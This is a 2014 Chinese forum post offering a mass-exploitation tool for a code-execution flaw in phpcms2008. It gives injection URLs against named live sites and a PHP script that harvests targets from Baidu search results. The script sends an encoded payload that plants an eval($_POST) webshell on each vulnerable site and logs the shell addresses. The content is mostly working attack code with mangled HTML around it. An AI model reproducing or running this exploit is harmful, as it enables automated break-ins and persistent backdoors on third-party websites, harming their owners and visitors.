东北仙儿哥 發表於 2014-5-9 15:04:33

phpcms2008 代码执行 批量getshell EXP(使用菜刀)

<p>玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧</p>
<p>谷歌批量还需改进 一会儿会补上! </p>
<p>原文:</p>
<p>http://www.wooyun.org/bug.php?action=view&amp;id=2984</p>
<p>测试如下:</p>
<p>http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}</p>
<p>测试结果:</p>
<p>http://www.cnqiyou.com/yp/product.php?pagesize=${@phpinfo()}</p>
<p>&nbsp;<img alt="" src="https://img.jbzj.com/file_images/article/201405/2014050915070110.jpg" /></p>
<p>EXP:</p>
<p>http://www.cnqiyou.com/yp/product.php?pagesize=${${@eval%28$_POST%29}}</p>
<p>直接菜刀链接 https://www.jb51.net/softs/163997.html</p>
<p>批量EXP:</p>
<p>PS:根据百度搜索批量&nbsp;<br /><br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode3"><br />&lt;?php<br />error_reporting(E_ERROR);<br />set_time_limit(0);&lt;/p&gt;
&lt;p&gt;$keyword='inurl:about/joinus' ; // 批量关键字<br />$timeout = 1; <br />$stratpage = 1; <br />$lastpage = 10000000; <br />for ($i=$stratpage ; $i&lt;=$lastpage ; $i++ ){<br />$array=ReadBaiduList($keyword,$timeout,$i);<br />foreach ($array as $url ){<br />$url_list=file('url.txt');<br />if (in_array("$url\r\n",$url_list)){<br />echo "[-]Links repeat\n";<br />      }else{<br />$fp = @fopen('url.txt', 'a'); <br />@fwrite($fp, $url."\r\n");<br />@fclose($fp);<br />print_r("<br />[-]Get ...... $url\r\n");<br />if(okbug($url)){<br />$exploit=exploit($url);&lt;/p&gt;
&lt;p&gt;$ors=okor($url);<br />if ($ors){<br />echo "[*]Shell:-&gt; ".$url."/yp/fuck.php\n"; <br />$fp = @fopen('shell.txt', 'a');<br />@fwrite($fp, $url."/yp/fuck.php\r\n");<br />@fclose($fp);<br />      <br />         }<br />      }else{<br />          <br />          print "[-]No Bug!\n";<br />          }          <br />      }<br />   }<br /> }&lt;/p&gt;
&lt;p&gt;function exploit($url){ <br />$host=$url;<br />$port="80"; <br />$content &lt;a href="mailto:='a=@eval(base64_decode($_POST));&amp;z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7'"&gt;='a=@eval(base64_decode($_POST));&amp;z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7'&lt;/a&gt;;<br />$data ='POST &lt;a&gt;/yp/product.php?pagesize=${${@eval%28$_POST%29&lt;/a&gt;}} HTTP/1.1'."\r\n"; <br />$data .= "X-Forwarded-For: 199.1.88.29\r\n";<br />$data .= "Referer: &lt;a href="http://$host\r\n"&gt;http://$host\r\n&lt;/a&gt;";<br />$data .= "Content-Type: application/x-www-form-urlencoded\r\n";<br />$data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n";<br />$data .= "Host: $host\r\n";<br />$data .= "Content-Length: ".strlen($content)."\r\n";<br />$data .= "Cache-Control: no-cache\r\n\r\n";<br />$data .= $content."\r\n";<br />$ock=fsockopen($host,$port);<br />if (!$ock) {<br />echo "[*]No response from $host\n";<br />}<br />fwrite($ock,$data);<br />while (!feof($ock)) {<br />$exp=fgets($ock, 1024);<br />return $exp;<br />}<br />}&lt;/p&gt;
&lt;p&gt;function okor($host){<br />$tmp = array();<br />$data = '';<br />$fp = @fsockopen($host,80,$errno,$errstr,60);<br />@fputs($fp,"GET /yp/fuck.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n");<br />while ($fp &amp;&amp; !feof($fp))<br />$data .= fread($fp, 102400);<br />@fclose($fp);<br />if (strpos($data, '200') !== false) {<br />return         true;<br />}else{<br />return false;<br />}<br />}<br />function okbug($host){<br />$tmp = array();<br />$data = '';<br />$fp = @fsockopen($host,80,$errno,$errstr,60);<br />@fputs($fp,'GET /yp/product.php?view_type=1&amp;catid=&amp;pagesize={${phpinfo()}}&amp;areaname=&amp;order= HTTP/1.1'."\r\nHost:$host\r\nConnection: Close\r\n\r\n");<br />while ($fp &amp;&amp; !feof($fp))<br />$data .= fread($fp, 102400);<br />@fclose($fp);<br />if(preg_match('/(php.ini)/i',$data)) {<br />return         true;<br />}else{<br />return false;<br />}<br />}&lt;/p&gt;
&lt;p&gt;function ReadBaiduList($keyword,$timeout,$nowpage) <br />{<br />$tmp = array();<br />//$data = '';<br />$nowpage = ($nowpage-1)*10;<br />$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);<br />@fputs($fp,"GET /s?wd=".urlencode($keyword)."&amp;pn=".$nowpage." HTTP/1.1\r\nHost:www.baidu.com\r\nConnection: Close\r\n\r\n");<br />while ($fp &amp;&amp; !feof($fp))<br />$data .= fread($fp, 1024);<br />@fclose($fp);<br />preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp);<br />$num = count($tmp);<br />$array = array();<br />for($i = 0;$i &lt; $num;$i++)<br />{<br />$row = explode('/',$tmp[$i]);<br />$array[] = str_replace('http://','',$row);<br />}<br />return $array;<br />}<br />?&gt;<br /></div></p>
頁: [1]
查看完整版本: phpcms2008 代码执行 批量getshell EXP(使用菜刀)